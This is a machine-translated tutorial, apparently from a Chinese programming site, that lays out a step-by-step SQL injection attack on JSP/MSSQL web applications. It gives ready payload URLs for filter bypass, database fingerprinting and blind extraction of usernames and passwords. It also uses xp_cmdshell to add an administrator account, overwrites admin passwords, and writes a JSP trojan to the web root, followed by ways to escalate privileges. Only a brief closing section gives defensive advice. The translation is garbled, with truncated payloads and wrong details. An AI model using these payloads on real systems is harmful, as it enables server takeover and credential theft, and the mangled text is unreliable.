SQL Injection Process details _ dynamic node Java school arrangement, sqljava

SQL Injection Process details _ dynamic node Java school arrangement, sqljava

The general idea of SQL injection attacks is:

1. SQL Injection Location discovered;
2. Determine the background database type;
3. Determine the executable status of XP_CMDSHELL.
4. WEB virtual directory discovered
5. Upload a JSP Trojan;
6. Get the Administrator permission;

I. Determination of SQL Injection Vulnerabilities

In general, SQL Injection generally exists in the form of HTTP: // xxx. xxx. xxx/abc. jsp? In jsp or dynamic web pages with parameters such as id = XX, sometimes a dynamic web page may have only one parameter, sometimes there may be N parameters, sometimes Integer Parameters, it is sometimes a string parameter and cannot be generalized. In short, as long as a dynamic webpage with parameters and the webpage accesses the database, there may be SQL injection. If programmers do not have security awareness and do not need to filter the necessary characters, there is a high possibility of SQL injection.
To fully understand the dynamic web page response information, adjust the IE configuration first. Remove the check box before IE menu-tool-Internet option-advanced-show friendly HTTP Error messages.

To clarify the problem, the following uses HTTP: // xxx. xxx. xxx/abc. jsp? P = YY is used as an example for analysis. YY may be an integer or a string.

1. Integer parameter judgment

When the input parameter YY is an integer, the SQL statement in abc. jsp is roughly as follows:
Select * from table name where field = YY, so you can use the following steps to test whether SQL Injection exists.
① HTTP: // xxx. xxx. xxx/abc. jsp? P = YY '(with a single quotation mark attached), the SQL statement in abc. JSP becomes
Select * from table name where field = YY ', abc. jsp running exception;
② HTTP: // xxx. xxx. xxx/abc. jsp? P = YY and 1 = 1, abc. jsp is running normally, and it is consistent with HTTP: // xxx. xxx. xxx/abc. jsp? P = YY: The running result is the same;
③ HTTP: // xxx. xxx. xxx/abc. jsp? P = YY and 1 = 2, abc. jsp running exception;
If the preceding three steps are fully met, the SQL injection vulnerability exists in abc. jsp.

2. Handling of Special Cases

Sometimes JSP programmers filter out single quotes and other characters in the programmer to prevent SQL injection. You can try the following methods.
① Fixed-size mixing: Because VBS are not case sensitive, programmers usually either filter all uppercase strings or all lowercase strings during filtering, while case-sensitive mixing is often ignored. For example, replace SelecT and select with SELECT;
② UNICODE method: in IIS, UNICODE character sets are used for internationalization. We can convert the string entered in IE into a UNICODE string for input. For example, + = % 2B, Space = % 20, etc. For URLEncode information, see Appendix 1;
③ ASCII code method: You can replace all or part of the entered characters with ASCII code, for example, U = chr (85), a = chr (97). For ASCII information, see appendix 2;

Ii. differentiate Database Server types

In general, mysql is the most commonly used database server, although they all support T-SQL standards, but there are differences, and different databases have different attack methods, must be treated differently.

1. Identify by using system variables of the Database Server

SQL-SERVER has user, db_name () and other system variables, using these system values not only can judge the SQL-SERVER, but also can get a lot of useful information. For example:
① HTTP: // xxx. xxx. xxx/abc. jsp? P = YY and user> 0 not only can judge whether it is a SQL-SERVER, but also can get the user name currently connected to the database
② HTTP: // xxx. xxx. xxx/abc. jsp? P = YY & n... db_name ()> 0 can not only judge whether it is a SQL-SERVER, but also get the name of the database currently in use;

2. Use System tables

The ACCESS system table is msysobjects, and has no ACCESS permission in the WEB environment, while the SQL-SERVER system table is sysobjects, has ACCESS permission in the WEB environment. For the following two statements:
① HTTP: // xxx. xxx. xxx/abc. jsp? P = YY and (select count (*) from sysobjects)> 0
② HTTP: // xxx. xxx. xxx/abc. jsp? P = YY and (select count (*) from msysobjects)> 0
If the database is a SQL-SERVE, the first, abc. jsp must be running normally, the second is abnormal; if ACCESS is, both are abnormal.

3. MSSQL three key system tables

Sysdatabases system table: each database on Microsoft SQL Server occupies one row in the table. When you first Install SQL Server, sysdatabases contains the master, model, msdb, mssqlweb, and tempdb database items. The table is only stored in the master database. This table is saved in the master database. What information is saved in this table? This is very important. It stores all the database names, as well as the database IDs and related information.

Here I will list the useful field names and descriptions. Name // indicates the name of the database.

Dbid // indicates the database ID. dbid ranges from 1 to 5. These databases are master, model, msdb, mssqlweb, and tempdb respectively. Select * from master. dbo. sysdatabases to query all database names.

Sysobjects: each database in the SQL-SERVER has this system table, which stores all the objects created in the database, such as constraints, default values, logs, rules, stored procedures, etc, each object occupies one row in the table. The following table describes the field names and descriptions of the system table.

Name, id, xtype, uid, status: Object Name, Object ID, object type, user id of the owner object, and object status.
Object Type (xtype ). It can be one of the following object types:
C = CHECK Constraints
D = DEFAULT value or DEFAULT Constraint
F = foreign key constraint
L = Log
FN = scalar function
IF = embedded table functions
P = Stored Procedure
PK = primary key constraint (type: K)
RF = copy and filter the Stored Procedure
S = system table
TF = table functions
TR = trigger
U = User table
UQ = UNIQUE constraint (type is K)
V = View
X = Extended Stored Procedure

When xtype = 'U' and status> 0 indicates that the table is created by the user, the object name is the table name, and the Object ID is the table ID value.

Use: select * from ChouYFD. dbo. sysobjects where xtype = 'U' and status> 0 to list the table names created by all users in ChouYFD.

Syscolumns: each column in each table and view occupies one row in the table, and each parameter in the stored procedure occupies one row in the table. The table is located in each database. The main fields are name, id, and colid, which are respectively the field name, table ID, and field id. The ID is the id of the table we just obtained using sysobjects.
Select * from ChouYFD. dbo. syscolumns where id = 123456789.

Iii. Determine the executable status of XP_CMDSHELL

If the account that is currently connected to data has the SA permission and master. dbo. xp_mongoshell extends the Stored Procedure (you can directly use the shell of the operating system to call this Stored Procedure). The entire computer can be fully controlled using the following methods, and all subsequent steps can be saved.
1. HTTP: // xxx. xxx. xxx/abc. jsp? P = YY & nb... er> 0 abc. jsp execution is abnormal, but you can get the username of the currently connected database (if dbo is displayed, it indicates SA ).
2. HTTP: // xxx. xxx. xxx/abc. jsp? P = YY... me ()> 0 abc. jsp execution exception, but the database name currently connected can be obtained.
3. HTTP: // xxx. xxx. xxx/abc. jsp? P = YY; exec master .. xp_cmdshell "net user aaa bbb/add" -- (the master is the primary database of the SQL-SERVER; the semicolon in the name indicates that the SQL-SERVER executes the statement name before the semicolon and continues executing the statement after it; "-" indicates that all the content after it is only annotated and the system does not execute it. You can directly add the operating system account aaa with the password bbb.
4. HTTP: // xxx. xxx. xxx/abc. jsp? P = YY; exec master .. xp_mongoshell "net localgroup administrators aaa/add" -- add the newly added account aaa to the administrators group.
5. HTTP: // xxx. xxx. xxx/abc. jsp? P = YY; backuup database name to disk = 'C: \ inetpub \ wwwroot \ save. db' backs up all the data to the WEB directory and downloads the file over HTTP (of course, the WEB virtual directory is preferred ).
6. Create a UNICODE vulnerability by copying CMD
HTTP: // xxx. xxx. xxx/abc. jsp? P = YY; exe... dbo. xp_mongoshell "copy c: \ winnt \ system32 \ cmd.exe c: \ inetpub \ scripts \ cmd.exe" creates a UNICODE vulnerability by exploiting this vulnerability, this completes the control of the entire computer (of course, the first choice is to know the WEB virtual directory ).

4. Discover WEB virtual directories

Only the WEB virtual directory can be found to determine the location where the JSP Trojan is placed and obtain the USER permission. Two methods are effective.

First, based on experience, the WEB virtual directory is: c: \ inetpub \ wwwroot; D: \ inetpub \ wwwroot; E: \ inetpub \ wwwroot, the executable virtual directory is: c: \ inetpub \ scripts; D: \ inetpub \ scripts; E: \ inetpub \ scripts.

The second is to traverse the directory structure of the system, analyze the results and find the WEB virtual directory;

First create a temporary table: temp
HTTP: // xxx. xxx. xxx/abc. jsp? P = YY; create & n... mp (id nvarchar (255), num1 nvarchar (255), num2 nvarchar (255), num3 nvarchar (255 ));--

Next:

(1) We can use xp_availablemedia to obtain all the current drives and store them in the temp table:
HTTP: // xxx. xxx. xxx/abc. jsp? P = YY; insert temp... ter. dbo. xp_availablemedia ;--
We can query the temp content to obtain the drive list and related information.

(2) We can use xp_subdirs to obtain the subdirectory list and store it in the temp table:
HTTP: // xxx. xxx. xxx/abc. jsp? P = YY; insert into temp (I... dbo. xp_subdirs 'C :\';--

(3) We can also use xp_dirtree to obtain the directory tree structure of all subdirectories and import them to the temp table:
HTTP: // xxx. xxx. xxx/abc. jsp? P = YY; insert into temp (id, num1) exec master. dbo. xp_dirtree 'C :\';--
In this way, you can successfully browse the list of all directories (folders:
To view the content of a file, run xp_cmdsell:
HTTP: // xxx. xxx. xxx/abc. jsp? P = YY; insert into temp (id) exec... nbsp; 'Type c: \ web \ index. jsp ';--
You can use the 'bulk insert' syntax to insert a text file into a temporary table. For example, bulk insert temp (id) from 'C: \ inetpub \ wwwroot \ index. jsp'
View temp to see the content of the index. jsp file! By analyzing various JSP files, you can obtain a large amount of system information, WEB construction and management information, and even the connection password of the SA account.
Of course, if xp_cmshell can be executed, we can use it to complete:
HTTP: // xxx. xxx. xxx/abc. jsp? P = YY; insert into temp (id) & nbs... into shell 'dir c :\';--
HTTP: // xxx. xxx. xxx/abc. jsp? P = YY; insert into temp (id) & n... p_20.shell 'dir c: \ *. jsp/s/';--
Through xp_cmdshell, we can see all what we want to see, including W3svc
HTTP: // xxx. xxx. xxx/abc. jsp? P = YY; insert into temp (id) exec master. dbo. xp_1_she... ub \ AdminScripts \ adsutil. vbs enum w3svc'
However, we can also use
HTTP: // xxx. xxx. xxx/abc. jsp? P = YY; insert into temp (id, num1) exec master. dbo. xp_dirtree 'C :\';--

Note:

1. After each of the preceding items is viewed, all contents in TEMP should be deleted:
HTTP: // xxx. xxx. xxx/abc. jsp? P = YY; delete from temp ;--
2. The TEMP table is browsed by: (Suppose TestDB is the name of the database currently connected)
HTTP: // xxx. xxx. xxx/abc. jsp? P = YY and (select top &... nbsp; TestDB. dbo. temp)> 0 to get the value of the first record id field in the table TEMP, and compare it with the integer, obviously abc. jsp is abnormal, but the id field value can be found in the exception. If the table name is xyz
HTTP: // xxx. xxx. xxx/abc. jsp? P = YY and (select top 1 id from... ere id not in ('xyz')> 0 to get the value of the second record id field in the TEMP table.

5. Upload JSP Trojans

The so-called JSP Trojan is a piece of JSP code with special functions and put it in the Scripts of the WEB virtual directory. Remote customers can execute it through IE to obtain the USER permission of the system, implement initial control over the system. There are two effective methods to upload JSP Trojans:

1. Use the WEB Remote Management Function

Many WEB sites provide remote management to facilitate maintenance. Many WEB sites have different access permissions for different users. In order to achieve the control of user permissions, there is a WEB page that requires the user name and password. Only after the correct value is entered can the next operation be performed to manage the WEB, such as uploading and downloading files, browsing directories, and modifying configurations.

Therefore, if you get the correct USER name and password, you can not only upload JSP Trojans, but sometimes even directly get the USER permission to browse the system, the complex operations of "discovering WEB virtual directories" in the previous step are ignored.

The username and password are generally stored in a table, and the problem is solved when the table is read. The following two effective methods are provided.

A. injection method:

Theoretically, the authentication webpage has the following types:
Select * from admin where username = 'xxx' and passWord = 'yyy' statement. If necessary character filtering is not performed before the sentence is officially run, it is easy to implement SQL injection.
For example, enter abc 'or 1 = 1 in the username text box -- enter 123 in the password box, and the SQL statement is changed:
Select * from admin where username = 'abc' or 1 = 1 and password = '000000' this statement can always be executed correctly regardless of the user name and password entered by the user. You can easily cheat the system, obtain a valid identity.

B. Guess the solution:

The basic idea is: to guess the names of all databases, guess the names of each table in the warehouse, analyze the table names that store the user name and password, and guess the names of each field in the table, guess the content of each record in the table.

L guess all database names

HTTP: // xxx. xxx. xxx/abc. jsp? P = YY and (select count (*) from master. dbo. sysdatabases where name> 1 and dbid = 6) <> 0 because the value of dbid ranges from 1 to 5, it is used by the system. Therefore, the user must have created it from 6. In addition, we submitted name> 1 (the name field is a character-type field and the number will be wrong), abc. jsp job exception, you can get the first database name, similarly change DBID to 7, 8, 9, 10, 11, 12... All Database names can be obtained.
Assume that the database name is TestDB.

L guess the name of the user table in the database

Guess: This method is used to guess the table name based on personal experience. Generally, user, users, member, members, userlist, memberlist, userinfo, manager, admin, adminuser, systemuser, systemusers, sysuser, sysusers, sysaccounts, and systemaccounts. And Judge by statement
HTTP: // xxx. xxx. xxx/abc. jsp? P = YY and (select count (*) from TestDB. dbo. Table Name)> 0 if the table name exists, abc. jsp works normally; otherwise, an exception occurs. Wait until you guess the name of the system account table.

Read method: The SQL-SERVER has a table that stores the core information of the system sysobjects, all the tables, views and other information about a database is stored in this table, and this table can be accessed through the WEB.

When xtype = 'U' and status> 0 indicates the table created by the user, you can obtain the name of the user table by finding and analyzing the table and name created by each user, the basic implementation method is:

① HTTP: // xxx. xxx. xxx/abc. jsp? P = YY and (select top 1 name from TestD... type = 'U' and status> 0)> 0 to get the name of the table created by the first user and compare it with an integer. the jsp job is abnormal, but the table name can be found in the exception. If the table name is xyz

② HTTP: // xxx. xxx. xxx/abc. jsp? P = YY and (select top 1 name from TestDB. dbo. sysobjects &... tatus> 0 and name not in ('xyz')> 0 to get the name of the table created by the second user. Similarly, you can get the names of all created tables.
According to the table name, the user name and password of the table are generally determined. The following assumes that the table is named Admin.

L name of the username field and password field

The admin table must have a username field and a password field. Only the names of these two fields can be obtained. There are two ways to get their names.

This method is used to guess the field name based on personal experience. Generally, the username field is commonly used: username, name, user, account, etc. The names of password fields are commonly used: password, pass, pwd, passwd, etc. And Judge by statement
HTTP: // xxx. xxx. xxx/abc. jsp? P = YY and (select count (field name) from TestDB. dbo. admin)> 0 "select count (field name) from table name" statement to obtain the number of rows in the Table. Therefore, if the field name exists, abc. jsp works normally; otherwise, an exception occurs. This loop continues until the names of the two fields are guessed.
Read method: the basic implementation method is
HTTP: // xxx. xxx. xxx/abc. jsp? P = YY and (select... me (object_id ('admin'), 1) from TestDB. dbo. sysobjects)> 0. Select top 1 col_name (object_id ('admin'), 1) from TestDB. dbo. sysobjects is the first field name for obtaining a known table name from sysobjects. When compared with an integer, it is clear that abc. jsp is abnormal, but the field name can be found in the exception. Replace 1 in col_name (object_id ('admin'), 1 with 2, 3, 4, 5, 6... You can obtain the names of all fields.

L guess the username and password

The most common and effective methods to guess the user name and password are:

ASCII code verbatim decoding method: although this method is slow, it is certainly feasible. The basic idea is to first guess the length of the field and then guess the value of each bit in sequence. The method of user name guessing is the same as that of password guessing. The following uses the user name guessing as an example to describe the process.

HTTP: // xxx. xxx. xxx/abc. jsp? P = YY and (select top & n... nbsp; from TestDB. dbo. admin) = X (X = 1, 2, 3, 4, 5 ,... N, username is the name of the username field, and admin is the table name). If x is a value of I and abc. jsp is running normally, I is the length of the first username.

For example, when HTTP: // xxx. xxx. xxx/abc. jsp is entered? P = YY and (select top... e) from TestDB. dbo. admin) = 8 When abc. jsp runs normally, the length of the first user name is 8

HTTP: // xxx. xxx. xxx/abc. jsp? P = YY and (sel... ascii (substring (username, m, 1) from TestDB. dbo. admin) = n (m value ranges from 1 to the length of the username obtained in the previous step. When m is 1, 2, 3 ,... Guess the number 1, 2, 3 ,... Bit value; n value is 1 ~ 9. ~ Z, ~ ASCII value of Z, that is, 1 ~ Any value between 128; admin is the name of the System user account table), if n is a value of I and abc. when jsp runs normally, the ASCII code corresponding to I is the user name value.

For example, when you enter

HTTP: // xxx. xxx. xxx/abc. jsp? P = YY and (sel... ascii (substring (username, 3, 1) from TestDB. dbo. admin) = 80 abc. if jsp runs normally, the third digit of the user name is P (ASCII of P is 80 );

HTTP: // xxx. xxx. xxx/abc. jsp? P = YY and (sel... ascii (substring (username, 9, 1) from TestDB. dbo. admin) = 33 abc. if jsp runs normally, the 9th-bit user name is! (! ASCII is 80 );

After you have guessed the first user name and password, you can guess all other user names and passwords. Note: Sometimes the obtained password may be the Information encrypted by md5 or other methods, and you also need to use a dedicated tool for password removal. You can also change the password before using it. See the following description.

Simple Method:

Guess User Name
HTTP: // xxx. xxx. xxx/abc. jsp? P = YY and (select top 1... o. admin where username> 1). flag is a field in the admin table, and username is the username field. In this case, abc. jsp is abnormal, but the Username value can be obtained. In the same way as above, you can get the second user name, the third user, and so on until all the user names in the table.

Guess the User Password: HTTP: // xxx. xxx. xxx/abc. jsp? P = YY and (select top 1 & nb... b. dbo. admin where pwd> 1). flag is a field in the admin table, and pwd is a password field. In this case, abc. jsp is abnormal, but the value of pwd can be obtained. In the same way, you can obtain the password of the second user name, the password of the third user, and so on until the password of all users in the table. The password is sometimes encrypted by MD5 and can be changed.

HTTP: // xxx. xxx. xxx/abc. jsp? P = YY; update TestDB. dbo. admin set pwd = '... where username = 'www '; -- (the MD5 value of 1 is AAABBBCCCDDDEEEF, that is, change the password to 1; www is a known user name)
You can change the password to the original value in the same way.

2. Use the table content to import files

SQL has the BCP command, which can export the table content into a text file and place it in a specified location. With this function, we can first create a temporary table, then input a JSP trojan in one row in the table, and then use the BCP command to export and form a JSP file.
The command line format is as follows:
Bcp "select * from text .. foo "queryout c: \ inetpub \ wwwroot \ runcommand. jsp-c-S localhost-U sa-P foobar (the 's' parameter is the server for query execution, the 'U' parameter is the user name, And the 'p' parameter is the password, finally, a runcommand is uploaded. jsp Trojan)

6. Obtain system administrator privileges

JSP Trojans only have the USER permission. To gain full control over the system, you must have the system administrator permission. What should I do? There are many methods to improve permissions:
Upload the trojan and modify the. ini file that runs automatically upon startup (it will die upon restart );
Copy cmd.exe to scripts to create a UNICODE vulnerability;
Download the SAM file, crack and obtain all the OS user names and passwords;
Wait, depending on the specific circumstances of the system, you can adopt different methods.

Postscript

As described above, SQL vulnerabilities are very dangerous, but I believe many small and medium websites in China still have such vulnerabilities. Some personal suggestions

1. The code should fully filter the input parameters and take extreme situations into consideration as much as possible.
2. Keep as few error messages as possible. Otherwise, irrelevant persons will be interested if they do not understand the information.
3. Do not run server processes as administrators
4. In some cases, the net command is a "Microsoft card" trojan for attackers.
5. strictly control the source of remote logon visitors
6. If possible, Windows is not recommended as the server operating system.

The above is all the content of this article. I hope it will be helpful for your learning and support for helping customers.